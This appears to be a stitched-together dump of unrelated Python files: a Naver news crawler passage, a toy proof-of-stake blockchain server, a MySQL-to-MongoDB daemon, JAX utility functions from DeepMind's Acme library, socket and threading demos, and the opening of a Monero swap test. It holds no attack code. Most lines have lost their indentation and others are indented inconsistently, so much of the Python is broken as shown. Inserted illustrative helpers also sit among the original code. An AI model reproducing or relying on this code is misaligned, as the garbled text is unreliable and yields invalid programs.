for year in range(start_year, end_year + 1):
print("start_year , end_year = " + " " + str(start_year) + " " + str(end_year))
print("start_month , end_month = " + " " + str(start_month) + " " + str(end_month))
if start_year == end_year:
year_startmonth = start_month
year_endmonth = end_month
else:
if year == start_year:
year_startmonth = start_month
year_endmonth = 12
elif year == end_year:
year_startmonth = 1
year_endmonth = end_month
else:
year_startmonth = 1
year_endmonth = 12
for month in range(year_startmonth, year_endmonth + 1):
for month_day in range(1, calendar.monthrange(year, month)[1] + 1):
# for month_day in range(1, 2):
print("month, day = " + str(month) + " " + str(month_day))
if len(str(month)) == 1:
month = "0" + str(month)
if len(str(month_day)) == 1:
month_day = "0" + str(month_day)
                    # Build the page URL for this date
url = category_url + str(year) + str(month) + str(month_day)
print("url = " + url)
                    # Find totalpage by exploiting Naver's paging: requesting page=10000,
                    # which does not exist, redirects to the last existing page (page=totalpage).
totalpage = ArticleParser.find_news_totalpage(url + "&page=10000")
print("totalpage = " + str(totalpage))
for page in range(1, totalpage + 1):
made_urls.append(url + "&page=" + str(page))
return made_urls
@staticmethod
def get_url_data(url, max_tries=10):
remaining_tries = int(max_tries)
while remaining_tries > 0:
try:
# print("url = " + url)
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'}
result = requests.get(url, headers = headers).text
# print("result = " + str(result))
return result
            except requests.exceptions.RequestException:
sleep(60)
remaining_tries = remaining_tries - 1
raise ResponseTimeout()
def crawling(self, category_name):
# Multi Process PID
print(category_name + " PID: " + str(os.getpid()))
        writer = Writer(category_name=category_name, date=self.date)
        # Get the CSV writer once here so it is always defined, even if an
        # exception is raised before a row is written.
        wcsv = writer.get_writer_csv()
        # Article list URL format
        url = "http://news.naver.com/main/list.nhn?mode=LSD&mid=sec&sid1=" + str(
            self.categories.get(category_name)) + "&date="
        print("url = " + url)
        # Collect articles dated from start_year/start_month through end_year/end_month.
day_urls = self.make_news_page_url(url, self.date['start_year'], self.date['end_year'],
self.date['start_month'], self.date['end_month'])
# for tmp in day_urls:
# print("day_urls =" + " " + tmp)
print(category_name + " Urls are generated")
print("The crawler starts")
for URL in day_urls:
print(URL)
regex = re.compile("date=(\d+)")
news_date = regex.findall(URL)[0]
request = self.get_url_data(URL)
document = BeautifulSoup(request, 'html.parser')
# html - newsflash_body - type06_headline, type06
            # Grab the article entries on this page
post_temp = document.select('.newsflash_body .type06_headline li dl')
post_temp.extend(document.select('.newsflash_body .type06 li dl'))
            # Store the URL of every article on this page
post = []
for line in post_temp:
                post.append(line.a.get('href'))  # collect every article URL from this page
del post_temp
# for tmp in post:
# print("post =" + " " + tmp)
            for content_url in post:  # article URL
                # Politeness delay between article requests
sleep(0.01)
                # Fetch the article HTML
request_content = self.get_url_data(content_url)
# print("request_content = " + request_content)
try:
document_content = BeautifulSoup(request_content, 'html.parser')
# print("document_content = " + str(document_content))
except:
continue
try:
                    # Extract the article headline
tag_headline = document_content.find_all('h3', {'id': 'articleTitle'}, {'class': 'tts_head'})
# print("tag_headline = " + str(tag_headline))
                    text_headline = ''  # initialize the headline text
text_headline = text_headline + ArticleParser.clear_headline(str(tag_headline[0].find_all(text=True)))
# print("text_headline = " + text_headline)
                    if not text_headline:  # skip the article if the headline is empty
continue
                    # Extract the article body
tag_content = document_content.find_all('div', {'id': 'articleBodyContents'})
# print("tag_content = " + str(tag_content))
                    text_sentence = ''  # initialize the body text
text_sentence = text_sentence + ArticleParser.clear_content(str(tag_content[0].find_all(text=True)))
# print("tag_content = " + str(tag_content))
                    if not text_sentence:  # skip the article if the body is empty
continue
                    # Extract the publisher
tag_company = document_content.find_all('meta', {'property': 'me2:category1'})
# print("tag_company = " + str(tag_company))
                    text_company = ''  # initialize the publisher
text_company = text_company + str(tag_company[0].get('content'))
# print("text_company = " + str(text_company))
                    if not text_company:  # skip the article if the publisher is missing
continue
                    # Write a CSV row (wcsv was obtained once above)
wcsv.writerow([news_date, category_name, text_company, text_headline, text_sentence, content_url])
del text_company, text_sentence, text_headline
del tag_company
del tag_content, tag_headline
del request_content, document_content
except Exception as ex: # UnicodeEncodeError ..
wcsv.writerow([ex, content_url])
del request_content, document_content
pass
# writer.close()
def start(self):
        # Start one crawling process per selected category
for category_name in self.selected_categories:
proc = Process(target=self.crawling, args=(category_name,))
proc.start()
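# --- Added illustration: a minimal usage sketch, not part of the original module.
# --- The category keys and date range below are assumed example values; the
# --- ArticleParser and Writer helpers imported above must be available.
if __name__ == '__main__':
    crawler = ArticleCrawler()
    crawler.set_category('politics', 'IT_science')  # any keys from self.categories
    crawler.set_date_range(2018, 1, 2018, 2)        # 2018-01 through 2018-02
    crawler.start()                                 # spawns one Process per category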
|
pos.py
|
#!/usr/bin/env python3
"""
This document is created by magic at 2018/8/17
"""
import time
import json
import threading
from hashlib import sha256
from datetime import datetime
from random import choice
from queue import Queue, Empty
from socketserver import BaseRequestHandler, ThreadingTCPServer
# We need two queues for inter-thread communication.
# Module-level shared state.
block_chain = []
temp_blocks = []
candidate_blocks = Queue()  # queue used to pass candidate blocks between threads
announcements = Queue()
validators = {}
My_Lock = threading.Lock()
def generate_block(oldblock, bpm, address):
"""
:param oldblock:
:param bpm:
:param address:
:return:
"""
newblock = {
"Index": oldblock["Index"] + 1,
"BPM": bpm,
"Timestamp": str(datetime.now()),
"PrevHash": oldblock["Hash"],
"Validator": address
}
newblock["Hash"] = calculate_hash(newblock)
return newblock
def calculate_hash(block):
record = "".join([
str(block["Index"]),
str(block["BPM"]),
block["Timestamp"],
block["PrevHash"]
])
return sha256(record.encode()).hexdigest()
def is_block_valid(newblock, oldblock):
"""
:param newblock:
:param oldblock:
:return:
"""
if oldblock["Index"] + 1 != newblock["Index"]:
return False
if oldblock["Hash"] != newblock["PrevHash"]:
return False
if calculate_hash(newblock) != newblock["Hash"]:
return False
return True
def pick_winner(announcements):
"""
    Pick the winning validator: every staked token counts as one lottery ticket.
:param announcements:
:return:
"""
time.sleep(10)
while True:
with My_Lock:
temp = temp_blocks
lottery_pool = [] #
if temp:
for block in temp:
if block["Validator"] not in lottery_pool:
set_validators = validators
k = set_validators.get(block["Validator"])
if k:
for i in range(k):
lottery_pool.append(block["Validator"])
lottery_winner = choice(lottery_pool)
print(lottery_winner)
            # add the winner's block to the blockchain and let all the other nodes know
for block in temp:
if block["Validator"] == lottery_winner:
with My_Lock:
block_chain.append(block)
                    # put the announcement ("<winner> won the right to forge the block") on the queue
msg = "\n{0} 赢得了记账权利\n".format(lottery_winner)
announcements.put(msg)
break
with My_Lock:
temp_blocks.clear()
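# --- Added illustration (hypothetical helper, never called by the server): the
# --- lottery above gives each validator one "ticket" per staked token, which is
# --- equivalent to a weighted random choice. The balances below are assumed values.
def _demo_weighted_lottery(stakes=None):
    from random import choices
    stakes = stakes or {"addr_a": 3, "addr_b": 1}  # assumed token balances
    # addr_a is three times as likely to win as addr_b.
    return choices(list(stakes), weights=list(stakes.values()), k=1)[0]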
class HandleConn(BaseRequestHandler):
def handle(self):
print("Got connection from", self.client_address)
# validator address
self.request.send(b"Enter token balance:")
balance = self.request.recv(8192)
try:
balance = int(balance)
        except Exception as e:
            print(e)
            balance = 0  # fall back to zero stake if the client sent a non-integer
t = str(datetime.now())
address = sha256(t.encode()).hexdigest()
validators[address] = balance
print(validators)
        # Start the winner-announcement thread once, outside the request loop,
        # rather than spawning a new thread for every submitted BPM.
        announce_winner_t = threading.Thread(target=annouce_winner, args=(announcements, self.request,),
                                             daemon=True)
        announce_winner_t.start()
        while True:
self.request.send(b"\nEnter a new BPM:")
bpm = self.request.recv(8192)
try:
bpm = int(bpm)
except Exception as e:
print(e)
del validators[address]
break
# with My_Lock:
last_block = block_chain[-1]
new_block = generate_block(last_block, bpm, address)
if is_block_valid(new_block, last_block):
print("new block is valid!")
candidate_blocks.put(new_block)
self.request.send(b"\nEnter a new BPM:\n")
annouce_blockchain_t = threading.Thread(target=annouce_blockchain, args=(self.request,), daemon=True)
annouce_blockchain_t.start()
def annouce_winner(announcements, request):
"""
:param announcements:
:param request:
:return:
"""
while True:
try:
msg = announcements.get(block=False)
request.send(msg.encode())
request.send(b'\n')
except Empty:
time.sleep(3)
continue
def annouce_blockchain(request):
"""
:param request:
:return:
"""
while True:
time.sleep(30)
with My_Lock:
output = json.dumps(block_chain)
try:
request.send(output.encode())
request.send(b'\n')
except OSError:
pass
def candidate(candidate_blocks):
"""
:param candidate_blocks:
:return:
"""
while True:
try:
candi = candidate_blocks.get(block=False)
except Empty:
time.sleep(5)
continue
temp_blocks.append(candi)
def run():
# create a genesis block
t = str(datetime.now())
genesis_block = {
"Index": 0,
"Timestamp": t,
"BPM": 0,
"PrevHash": "",
"Validator": ""
}
genesis_block["Hash"] = calculate_hash(genesis_block)
print(genesis_block)
block_chain.append(genesis_block)
thread_canditate = threading.Thread(target=candidate, args=(candidate_blocks,), daemon=True)
thread_pick = threading.Thread(target=pick_winner, args=(announcements,), daemon=True)
thread_canditate.start()
thread_pick.start()
# start a tcp server
serv = ThreadingTCPServer(('', 9090), HandleConn)
serv.serve_forever()
if __name__ == '__main__':
run()
|
mymongodaemon.py
|
import sys
import time
import logging
import os
import configparser
from importlib import util
from multiprocessing import Process
from multiprocessing import Queue
from apscheduler.schedulers.blocking import BlockingScheduler
from mymongolib.daemon import Daemon
from mymongolib import mysql
from mymongolib.mongodb import MyMongoDB
from mymongolib.datamunging import DataMunging
from mymongomodules.parse_data import ParseData
from mymongomodules.process_data import ProcessData
config = configparser.ConfigParser()
config.read('conf/config.ini')
class MyMongoDaemon(Daemon):
"""Subclass of :class:`.Daemon`
"""
def run(self):
"""Runs the daemon
        This method runs the daemon and creates all the processes it needs, then waits forever.
"""
self.logger = logging.getLogger(__name__)
sys.stderr = self.log_err
try:
util.find_spec('setproctitle')
self.setproctitle = True
import setproctitle
setproctitle.setproctitle('mymongo')
except ImportError:
self.setproctitle = False
self.logger.info("Running")
self.queues = dict()
self.queues['replicator_out'] = Queue()
procs = dict()
procs['scheduler'] = Process(name='scheduler', target=self.scheduler)
procs['scheduler'].daemon = True
procs['scheduler'].start()
procs['replicator'] = Process(name='replicator', target=self.replicator)
procs['replicator'].daemon = True
procs['replicator'].start()
procs['datamunging'] = Process(name='datamunging', target=self.data_munging)
procs['datamunging'].daemon = True
procs['datamunging'].start()
procs['dataprocess'] = Process(name='dataprocess', target=self.data_process)
procs['dataprocess'].daemon = True
procs['dataprocess'].start()
while True:
self.logger.info('Working...')
time.sleep(60)
def scheduler(self):
"""Runs the daemon scheduler
"""
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_scheduler')
sched = BlockingScheduler()
try:
sched.add_job(self.dummy_sched, 'interval', minutes=1)
sched.start()
except Exception as e:
self.logger.error('Cannot start scheduler. Error: ' + str(e))
def dummy_sched(self):
"""Dummy method to keep the schedule running
"""
self.logger.info('Scheduler works!')
def write_pid(self, pid):
"""Write pid to the pidfile
Args:
pid (int): number of process id
"""
open(self.pidfile, 'a+').write("{}\n".format(pid))
def replicator(self):
"""Main process for replication. It writes entry in the replication queue
See Also:
:meth:`.data_munging`
"""
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_replicator')
mongo = MyMongoDB(config['mongodb'])
mysql.mysql_stream(config['mysql'], mongo, self.queues['replicator_out'])
def data_munging(self):
"""Reads data from replpication queue and writes to mongo
See Also:
:meth:`.replicator`
"""
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_datamunging')
module_instance = ParseData()
mongo = MyMongoDB(config['mongodb'])
munging = DataMunging(mongo, self.queues['replicator_out'])
munging.run(module_instance)
def data_process(self):
self.write_pid(str(os.getpid()))
if self.setproctitle:
import setproctitle
setproctitle.setproctitle('mymongo_dataprocess')
mongo = MyMongoDB(config['mongodb'])
process_instance = ProcessData(mongo)
process_instance.run()
|
utils.py
|
# python3
# Copyright 2018 DeepMind Technologies Limited. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for JAX."""
import functools
import itertools
import queue
import threading
from typing import Callable, Iterable, Generator, NamedTuple, Optional, Sequence, TypeVar, Tuple
from absl import logging
from acme import types
import jax
import jax.numpy as jnp
import numpy as np
import tree
F = TypeVar('F', bound=Callable)
N = TypeVar('N', bound=types.NestedArray)
T = TypeVar('T')
def add_batch_dim(values: types.Nest) -> types.NestedArray:
return jax.tree_map(lambda x: jnp.expand_dims(x, axis=0), values)
def _flatten(x: jnp.ndarray, num_batch_dims: int) -> jnp.ndarray:
"""Flattens the input, preserving the first ``num_batch_dims`` dimensions.
If the input has fewer than ``num_batch_dims`` dimensions, it is returned
unchanged.
If the input has exactly ``num_batch_dims`` dimensions, an extra dimension
is added. This is needed to handle batched scalars.
Arguments:
x: the input array to flatten.
num_batch_dims: number of dimensions to preserve.
Returns:
flattened input.
"""
# TODO(b/173492429): consider throwing an error instead.
if x.ndim < num_batch_dims:
return x
return jnp.reshape(x, list(x.shape[:num_batch_dims]) + [-1])
def batch_concat(
values: types.NestedArray,
num_batch_dims: int = 1,
) -> jnp.ndarray:
"""Flatten and concatenate nested array structure, keeping batch dims."""
flatten_fn = lambda x: _flatten(x, num_batch_dims)
flat_leaves = tree.map_structure(flatten_fn, values)
return jnp.concatenate(tree.flatten(flat_leaves), axis=-1)
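# Added illustrative sketch (not part of the original module): batch_concat
# flattens every leaf while keeping the leading batch dimension, then
# concatenates along the feature axis. With the assumed shapes below,
# {'a': (4, 2, 3), 'b': (4, 5)} becomes a single (4, 11) array.
def _demo_batch_concat() -> Tuple[int, ...]:
  nest = {'a': jnp.ones((4, 2, 3)), 'b': jnp.zeros((4, 5))}
  return batch_concat(nest).shape  # (4, 11)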
def zeros_like(nest: types.Nest) -> types.NestedArray:
return jax.tree_map(lambda x: jnp.zeros(x.shape, x.dtype), nest)
def squeeze_batch_dim(nest: types.Nest) -> types.NestedArray:
return jax.tree_map(lambda x: jnp.squeeze(x, axis=0), nest)
def to_numpy_squeeze(values: types.Nest) -> types.NestedArray:
"""Converts to numpy and squeezes out dummy batch dimension."""
return jax.tree_map(lambda x: np.asarray(x).squeeze(axis=0), values)
def to_numpy(values: types.Nest) -> types.NestedArray:
return jax.tree_map(np.asarray, values)
def fetch_devicearray(values: types.Nest) -> types.Nest:
"""Fetches and converts any DeviceArrays to np.ndarrays."""
return tree.map_structure(_fetch_devicearray, values)
def _fetch_devicearray(x):
if isinstance(x, jax.xla.DeviceArray):
return np.asarray(x)
return x
def batch_to_sequence(values: types.Nest) -> types.NestedArray:
return jax.tree_map(
lambda x: jnp.transpose(x, axes=(1, 0, *range(2, len(x.shape)))), values)
def tile_array(array: jnp.ndarray, multiple: int) -> jnp.ndarray:
"""Tiles `multiple` copies of `array` along a new leading axis."""
return jnp.stack([array] * multiple)
def tile_nested(inputs: types.Nest, multiple: int) -> types.Nest:
"""Tiles tensors in a nested structure along a new leading axis."""
tile = functools.partial(tile_array, multiple=multiple)
return jax.tree_map(tile, inputs)
def prefetch(iterable: Iterable[T],
buffer_size: int = 5,
device=None) -> Generator[T, None, None]:
"""Performs prefetching of elements from an iterable in a separate thread.
Args:
iterable: A python iterable. This is used to build the python prefetcher.
Note that each iterable should only be passed to this function once as
iterables aren't thread safe
buffer_size (int): Number of elements to keep in the prefetch buffer.
device: The device to prefetch the elements to. If none then the elements
are left on the CPU. The device should be of the type returned by
`jax.devices()`.
Yields:
Prefetched elements from the original iterable.
Raises:
ValueError if the buffer_size <= 1.
Any error thrown by the iterable_function. Note this is not raised inside
the producer, but after it finishes executing.
"""
if buffer_size <= 1:
raise ValueError('the buffer_size should be > 1')
buffer = queue.Queue(maxsize=(buffer_size - 1))
producer_error = []
end = object()
def producer():
"""Enqueues items from `iterable` on a given thread."""
try:
# Build a new iterable for each thread. This is crucial if working with
# tensorflow datasets because tf.Graph objects are thread local.
for item in iterable:
if device:
item = jax.device_put(item, device)
buffer.put(item)
except Exception as e: # pylint: disable=broad-except
logging.exception('Error in producer thread for %s', iterable)
producer_error.append(e)
finally:
buffer.put(end)
# Start the producer thread.
threading.Thread(target=producer, daemon=True).start()
# Consume from the buffer.
while True:
value = buffer.get()
if value is end:
break
yield value
if producer_error:
raise producer_error[0]
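# Added illustrative sketch (not part of the original module): consuming a
# plain Python generator through `prefetch`. The generator below is an assumed
# stand-in for a real data iterator; with device=None the batches stay on host.
def _demo_prefetch() -> float:
  def batches():
    for i in range(10):
      yield np.full((2, 3), float(i))
  total = 0.0
  for batch in prefetch(batches(), buffer_size=3):
    total += float(batch.sum())
  return total  # 270.0 == 6 * (0 + 1 + ... + 9)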
class PrefetchingSplit(NamedTuple):
host: types.NestedArray
device: types.NestedArray
_SplitFunction = Callable[[types.NestedArray], PrefetchingSplit]
def sharded_prefetch(
iterable: Iterable[types.NestedArray],
buffer_size: int = 5,
num_threads: int = 1,
split_fn: Optional[_SplitFunction] = None,
devices: Optional[Sequence[jax.xla.Device]] = None,
) -> Generator[types.NestedArray, None, None]:
"""Performs sharded prefetching from an iterable in separate threads.
Elements from the resulting generator are intended to be used in a jax.pmap
call. Every element is a sharded prefetched array with an additional replica
dimension and corresponds to jax.local_device_count() elements from the
original iterable.
Args:
iterable: A python iterable. This is used to build the python prefetcher.
Note that each iterable should only be passed to this function once as
iterables aren't thread safe.
buffer_size (int): Number of elements to keep in the prefetch buffer.
num_threads (int): Number of threads.
split_fn: Optional function applied to every element from the iterable to
split the parts of it that will be kept in the host and the parts that
will sent to the device.
devices: Devices used for prefecthing. Optional, jax.local_devices() by
default.
Yields:
Prefetched elements from the original iterable with additional replica
dimension.
Raises:
ValueError if the buffer_size <= 1.
Any error thrown by the iterable_function. Note this is not raised inside
the producer, but after it finishes executing.
"""
devices = devices or jax.local_devices()
if buffer_size <= 1:
raise ValueError('the buffer_size should be > 1')
buffer = queue.Queue(maxsize=(buffer_size - 1))
producer_error = []
end = object()
def producer():
"""Enqueues batched items from `iterable` on a given thread."""
try:
# Build a new iterable for each thread. This is crucial if working with
# tensorflow datasets because tf.Graph objects are thread local.
it = iter(iterable)
while True:
        items = tuple(itertools.islice(it, len(devices)))
        if not items:
break
if split_fn is None:
buffer.put(jax.device_put_sharded(tuple(items), devices))
else:
# ((host: x1, device: y1), ..., (host: xN, device: yN)).
items_split = (split_fn(item) for item in items)
# (host: (x1, ..., xN), device: (y1, ..., yN)).
split = tree.map_structure_up_to(
PrefetchingSplit(None, None), lambda *x: x, *items_split)
buffer.put(
PrefetchingSplit(
host=np.stack(split.host),
device=jax.device_put_sharded(split.device, devices)))
except Exception as e: # pylint: disable=broad-except
logging.exception('Error in producer thread for %s', iterable)
producer_error.append(e)
finally:
buffer.put(end)
# Start producer threads.
for _ in range(num_threads):
threading.Thread(target=producer, daemon=True).start()
# Consume from the buffer.
while True:
value = buffer.get()
if value is end:
break
yield value
if producer_error:
raise producer_error[0]
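# Added illustrative sketch (not part of the original module): using `split_fn`
# to keep a scalar key on the host while sharding the array part across the
# local devices. The element structure below is an assumption for illustration.
def _demo_sharded_prefetch() -> PrefetchingSplit:
  def elements():
    i = 0
    while True:
      yield {'key': np.int32(i), 'obs': np.full((8,), float(i), np.float32)}
      i += 1
  split = lambda el: PrefetchingSplit(host=el['key'], device=el['obs'])
  it = sharded_prefetch(elements(), buffer_size=2, split_fn=split)
  first = next(it)
  # first.host has shape [num_local_devices]; first.device is sharded across devices.
  return first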
def replicate_in_all_devices(nest: N,
devices: Optional[Sequence[jax.xla.Device]] = None
) -> N:
"""Replicate array nest in all available devices."""
devices = devices or jax.local_devices()
return jax.api.device_put_sharded([nest] * len(devices), devices)
def get_from_first_device(nest: N, as_numpy: bool = True) -> N:
"""Gets the first array of a nest of `jax.pxla.ShardedDeviceArray`s.
Args:
nest: A nest of `jax.pxla.ShardedDeviceArray`s.
as_numpy: If `True` then each `DeviceArray` that is retrieved is transformed
(and copied if not on the host machine) into a `np.ndarray`.
Returns:
The first array of a nest of `jax.pxla.ShardedDeviceArray`s. Note that if
`as_numpy=False` then the array will be a `DeviceArray` (which will live on
the same device as the sharded device array). If `as_numpy=True` then the
array will be copied to the host machine and converted into a `np.ndarray`.
"""
def _slice_and_maybe_to_numpy(x):
if not isinstance(x, jax.pxla.ShardedDeviceArray):
raise ValueError('get_from_first_device should only be used with '
f'{jax.pxla.ShardedDeviceArray}, passed {type(x)}.')
x = x[0]
return _fetch_devicearray(x) if as_numpy else x
return jax.tree_map(_slice_and_maybe_to_numpy, nest)
def mapreduce(
f: F,
reduce_fn: Optional[Callable[[jnp.DeviceArray], jnp.DeviceArray]] = None,
**vmap_kwargs,
) -> F:
"""A simple decorator that transforms `f` into (`reduce_fn` o vmap o f).
By default, we vmap over axis 0, and the `reduce_fn` is jnp.mean over axis 0.
Note that the call signature of `f` is invariant under this transformation.
If, for example, f has shape signature [H, W] -> [N], then mapreduce(f)
(with the default arguments) will have shape signature [B, H, W] -> [N].
Args:
f: A pure function over examples.
reduce_fn: A pure function that reduces DeviceArrays -> DeviceArrays.
**vmap_kwargs: Keyword arguments to forward to `jax.vmap`.
Returns:
g: A pure function over batches of examples.
"""
if reduce_fn is None:
reduce_fn = lambda x: jnp.mean(x, axis=0)
vmapped_f = jax.vmap(f, **vmap_kwargs)
def g(*args, **kwargs):
return jax.tree_map(reduce_fn, vmapped_f(*args, **kwargs))
return g
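# Added illustrative sketch (not part of the original module): mapreduce turns a
# per-example function with signature [D] -> [] into a batched [B, D] -> []
# function that averages over the batch (the default reduce_fn).
def _demo_mapreduce() -> jnp.ndarray:
  per_example = lambda x: jnp.sum(x ** 2)  # [D] -> []
  batched = mapreduce(per_example)         # [B, D] -> []
  return batched(jnp.ones((4, 3)))         # == 3.0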
_TrainingState = TypeVar('_TrainingState')
_TrainingAux = TypeVar('_TrainingAux')
def process_multiple_batches(
process_one_batch: Callable[[_TrainingState, _TrainingAux],
Tuple[_TrainingState, _TrainingAux]],
num_batches: int,
postprocess_aux: Optional[Callable[[_TrainingAux], _TrainingAux]] = None):
"""Makes 'process_one_batch' process multiple batches at once.
Args:
process_one_batch: a function that takes 'state' and 'data', and returns
'new_state' and 'aux' (for example 'metrics').
num_batches: how many batches to process at once
postprocess_aux: how to merge the extra information, defaults to taking
the mean.
Returns:
A function with the same interface as 'process_one_batch' which processes
multiple batches at once.
"""
assert num_batches >= 1
if num_batches == 1:
if not postprocess_aux:
return process_one_batch
def _process_one_batch(state, data):
state, aux = process_one_batch(state, data)
return state, postprocess_aux(aux)
return _process_one_batch
if postprocess_aux is None:
postprocess_aux = lambda x: jax.tree_map(jnp.mean, x)
def _process_multiple_batches(state, data):
data = jax.tree_map(
lambda a: jnp.reshape(a, (num_batches, -1, *a.shape[1:])), data)
state, aux = jax.lax.scan(
process_one_batch, state, data, length=num_batches)
return state, postprocess_aux(aux)
return _process_multiple_batches
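# Added illustrative sketch (not part of the original module): a toy
# `process_one_batch` that accumulates a running sum as the state and reports
# the batch mean as `aux`. With num_batches=4 the data below is reshaped to
# (4, 2), scanned over, and the per-batch aux means are averaged by default.
def _demo_process_multiple_batches():
  def process_one_batch(state, data):
    return state + jnp.sum(data), jnp.mean(data)
  step = process_multiple_batches(process_one_batch, num_batches=4)
  state, aux = step(jnp.zeros((), jnp.float32), jnp.arange(8, dtype=jnp.float32))
  return state, aux  # state == 28.0, aux == 3.5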
def weighted_softmax(x: jnp.ndarray, weights: jnp.ndarray, axis: int = 0):
  x = x - jnp.max(x, axis=axis, keepdims=True)
return weights * jnp.exp(x) / jnp.sum(weights * jnp.exp(x),
axis=axis, keepdims=True)
|
threading_mixin_socket_server.py
|
import os
import socket
import threading
import socketserver
# helper for converting a str to bytes
# (used when sending data over the socket)
encode = lambda text: text.encode()
# helper for converting bytes back to a str
# (used when decoding data received over the socket)
decode = lambda byte_text: byte_text.decode()
SERVER_HOST = 'localhost'
# tell kernel to pick port dynamically
SERVER_PORT = 0
BUFF_SIZE = 1024
ECHO_MSG = 'Hello echo server'
def client(ip, port, message):
""" A client to test threading mmixin socket server """
# connect to server
sock = socket.socket()
sock.connect((ip, port))
try:
sock.sendall(encode(message))
response = sock.recv(BUFF_SIZE)
print('Client received : {}'.format(decode(response)))
finally:
sock.close()
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
""" An example of threaded TCP request handler """
def handle(self):
data = self.request.recv(BUFF_SIZE)
current_thread = threading.current_thread()
response = '{} : {}'.format(current_thread.name, decode(data))
self.request.sendall(encode(response))
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
""" Nothing to add here, inherited everything from parents """
pass
def main():
# run server
server = ThreadedTCPServer(
(SERVER_HOST, SERVER_PORT), ThreadedTCPRequestHandler)
    ip, port = server.server_address  # get the (ip, port) the kernel assigned
    # start a thread to run the server loop -- the server spawns one thread per request
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
    print('Server loop running on thread {}'.format(server_thread.name))
# Run clients
client(ip, port, "Hello from client1")
client(ip, port, "Hello from client2")
client(ip, port, "Hello from client3")
# server cleanup
server.shutdown()
if __name__ == '__main__':
main()
|
thread3a.py
|
# thread3a.py: demonstrates what happens when no thread synchronization is used
from threading import Thread
def inc():
global x
for _ in range(1000000):
x+=1
# global counter shared by both threads
x = 0
# creating threads
t1 = Thread(target=inc, name="Th 1")
t2 = Thread(target=inc, name="Th 2")
# start the threads
t1.start()
t2.start()
# wait for the threads to finish
t1.join()
t2.join()
print("final value of x :", x)
|
test_run.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Copyright (c) 2020 tecnovert
# Distributed under the MIT software license, see the accompanying
# file LICENSE.txt or http://www.opensource.org/licenses/mit-license.php.
import os
import time
import shutil
import logging
import unittest
import threading
from xmrswap.rpc import waitForRPC, callrpc_xmr, callrpc_xmr_na
from xmrswap.util import dumpj, make_int
from xmrswap.ecc_util import h2b
from xmrswap.interface_xmr import XMR_COIN
from xmrswap.contrib.test_framework import segwit_addr
from xmrswap.contrib.test_framework.wallet_util import bytes_to_wif
from tests.xmrswap.common import (
TEST_DATADIRS,
BITCOIN_BINDIR, BITCOIND,
XMR_BINDIR, XMRD, XMR_WALLET_RPC,
NUM_NODES,
BASE_RPC_PORT,
XMR_NUM_NODES,
XMR_BASE_RPC_PORT, XMR_BASE_WALLET_RPC_PORT,
prepareXmrDataDir, prepareDataDir,
startXmrDaemon, startXmrWalletRPC,
startDaemon, callnoderpc, make_rpc_func,
checkSoftForks, stopNodes, callSwapTool,
waitForXMRNode, waitForXMRWallet
)
TEST_DIR = os.path.join(TEST_DATADIRS, 'btc')
logger = logging.getLogger()
ID_ALICE_XMR = 1
ID_BOB_XMR = 2
ID_ALICE_BTC = 1
ID_BOB_BTC = 2
def run_loop(cls):
while not cls.stop_nodes:
if cls.btc_addr is not None:
callnoderpc(0, 'generatetoaddress', [1, cls.btc_addr])
if cls.xmr_addr is not None:
callrpc_xmr_na(XMR_BASE_RPC_PORT + 0, 'generateblocks', {'wallet_address': cls.xmr_addr, 'amount_of_blocks': 1})
time.sleep(0.5)
class Test(unittest.TestCase):
@classmethod
def setUpClass(cls):
cls.stop_nodes = False
cls.update_thread = None
cls.daemons = []
cls.xmr_daemons = []
cls.xmr_wallet_auth = []
cls.btc_addr = None
cls.xmr_addr = None
super(Test, cls).setUpClass()
logger.propagate = False
logger.handlers = []
logger.setLevel(logging.INFO) # DEBUG shows many messages from requests.post
formatter = logging.Formatter('%(asctime)s %(levelname)s : %(message)s')
stream_stdout = logging.StreamHandler()
stream_stdout.setFormatter(formatter)
logger.addHandler(stream_stdout)
if os.path.isdir(TEST_DIR):
logging.info('Removing ' + TEST_DIR)
shutil.rmtree(TEST_DIR)
if not os.path.exists(TEST_DIR):
os.makedirs(TEST_DIR)
cls.stream_fp = logging.FileHandler(os.path.join(TEST_DIR, 'test.log'))
cls.stream_fp.setFormatter(formatter)
logger.addHandler(cls.stream_fp)
for i in range(NUM_NODES):
prepareDataDir(TEST_DIR, i, 'bitcoin.conf')
cls.daemons.append(startDaemon(os.path.join(TEST_DIR, str(i)), BITCOIN_BINDIR, BITCOIND))
logging.info('Started %s %d', BITCOIND, cls.daemons[-1].pid)
waitForRPC(make_rpc_func(i))
for i in range(XMR_NUM_NODES):
prepareXmrDataDir(TEST_DIR, i, 'monerod.conf')
cls.xmr_daemons.append(startXmrDaemon(os.path.join(TEST_DIR, 'xmr' + str(i)), XMR_BINDIR, XMRD))
logging.info('Started %s %d', XMRD, cls.xmr_daemons[-1].pid)
waitForXMRNode(i)
cls.xmr_daemons.append(startXmrWalletRPC(os.path.join(TEST_DIR, 'xmr' + str(i)), XMR_BINDIR, XMR_WALLET_RPC, i))
for i in range(XMR_NUM_NODES):
cls.xmr_wallet_auth.append(('test{0}'.format(i), 'test_pass{0}'.format(i)))
logging.info('Creating XMR wallet %i', i)
waitForXMRWallet(i, cls.xmr_wallet_auth[i])
cls.callxmrnodewallet(cls, i, 'create_wallet', {'filename': 'testwallet', 'language': 'English'})
cls.callxmrnodewallet(cls, i, 'open_wallet', {'filename': 'testwallet'})
cls.btc_addr = callnoderpc(0, 'getnewaddress', ['mining_addr', 'bech32'])
cls.xmr_addr = cls.callxmrnodewallet(cls, 0, 'get_address')['address']
